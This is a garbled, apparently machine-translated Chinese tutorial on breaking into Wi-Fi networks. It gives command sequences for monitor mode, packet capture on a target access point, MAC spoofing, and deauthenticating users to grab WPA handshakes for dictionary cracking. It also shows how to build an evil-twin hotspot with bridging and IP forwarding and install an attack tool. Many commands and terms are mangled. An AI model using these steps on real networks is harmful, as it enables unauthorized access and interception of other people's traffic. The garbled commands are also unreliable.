Bss無線接入點的Mac地址
破解WiFi,看下面破解wpa。
iwconfig
iw列表
Iw dev wlan0mon設置頻道4將頻道更改為4。
Iwlist wlan0mon頻道查看wlan0mon所在的頻道。WLAN 0mon所在的頻道應該和要捕獲的頻道在同壹個頻道。
Iw dev wlan0 scan | grep SSID掃描附近的ap (WiFi)。
iw dev WLAN 0 scan | egrep " ds \ parameter \ set | ssid "可以過濾掉地基信道。
Iw dev wlan0接口添加wlan0 mon類型監控器添加壹個可以被監控的網卡接口註意WLAN 0,它是妳自己的無線網卡。妳可以用iwconfig檢查是wlan1還是wlan2,然後在iwconfig裏可以看到wlan0mon(如果看不到關閉服務網絡的嘗試-manager停止服務),然後用ifconfig啟動wlan0mon,然後用wireshark抓取包。
Iw dev wlan0mon interface del刪除添加的NIC接口。
服務網絡-管理器stop首先關閉該服務。
Airmon-ng檢查可以檢測潛在的沖突進程。
Airmon-ng check kill可以殺死所有沖突進程。
Airmon-ng start wlan0 6開始監聽wlan0。這個數字6是可以開始收聽的頻道。和上面的iw命令沒什麽區別。
Iwlist wlan0mon頻道查看您當前所在的頻道。
Airmon-ng stop wlan0mon關閉監聽,然後用ifconfig wlan0 up啟動無線網卡,再用service network-manager start啟動服務,可以正常使用。
Airodump-ng wlan0mon默認抓取所有通道的包。airodump-ng wlan0 -c 1,數字1的意思是搶1通道的包。
airodump-ng WLAN 0 mon-c 1-bssid 00:11:22:33:44:55-wfilename。cap-iv,每個都可以省略——bssid代表抓取只有這個ap-w文件名的包才能保存抓取的包。
包註入講究的是讓自己和目標保持在壹個頻道上。
如果要偽造源地址,可以使用mac Changer-M 00:11:22:33:44:55 WLAN 0 mon將自己的MAC地址更改為與要偽造的地址相同。
air play-ng-9 WLAN 0 mon包註入測試如果不成功,可以嘗試運行ifconfig wlan0mon up。
此時網絡中會有兩臺mac相同的設備,會有丟包。
如果WiFi只使用mac地址過濾,可以不用密碼連接,可以用破解後的WiFi密碼加mac地址偽造有密碼和mac綁定的WiFi。
相對簡單,只要抓到足夠多的袋子,就可以完全破解。
對思想的猛烈抨擊
抓住了壹個用戶的手包。
如果壹個用戶連接了,他可以通過斷開連接再重新連接來獲得壹個握手包(不要等別人連接)
然後把大量的密碼字典放進握手包裏,計算密碼是否正確。這樣用顯卡跑會快很多,也可以去淘寶找人跑包。
打開壹個wifi熱點
使用上述命令後,可以使用ifconfig -a查看是否有壹個名為at0的額外網卡。下壹步就是橋接at0和eth0(也就是如果用WiFi的話,連接外網的網卡是wlan0)。
Apt-get安裝bridge-utils橋接網卡套件
網橋接口的成員接口是eth0和at0,不能有ip地址,所以分開使用。
ifconfig eth 0 . 0 . 0 . 0以上
ifconfig at0 0.0.0.0以上
要啟動這兩個接口,IP地址是0.0.0.0。
再用
ifconfig橋192.168.1.10以上
給上面創建的網橋網卡壹個ip地址並啟動它。這個IP地址使用上面eth0的IP地址。
添加網關的目的是讓連接到黑客啟用的WiFi的用戶直接從實際路由獲取ip地址。
網絡統計
路由添加-網絡0.0.0.0網絡掩碼0 . 0 . 0 . 0 GW 192.168.1.1
開始IP轉發
echo 1 & gt;/proc/sys/net/ipv4/ip_forward
cat/proc/sys/net/IP v4/IP _ forward確認修改。
git clone/p0cl 4 bs/3 viltwinharger . git
CD 3viltwin攻擊者
chmod +x installer.sh
。/installer.sh - install
所以安裝是成功的。
開始使用工具
Wifi-pumpkin不是之前的3viltwin攻擊者。看看最後安裝的命令行。紅色的字在終端執行這個命令。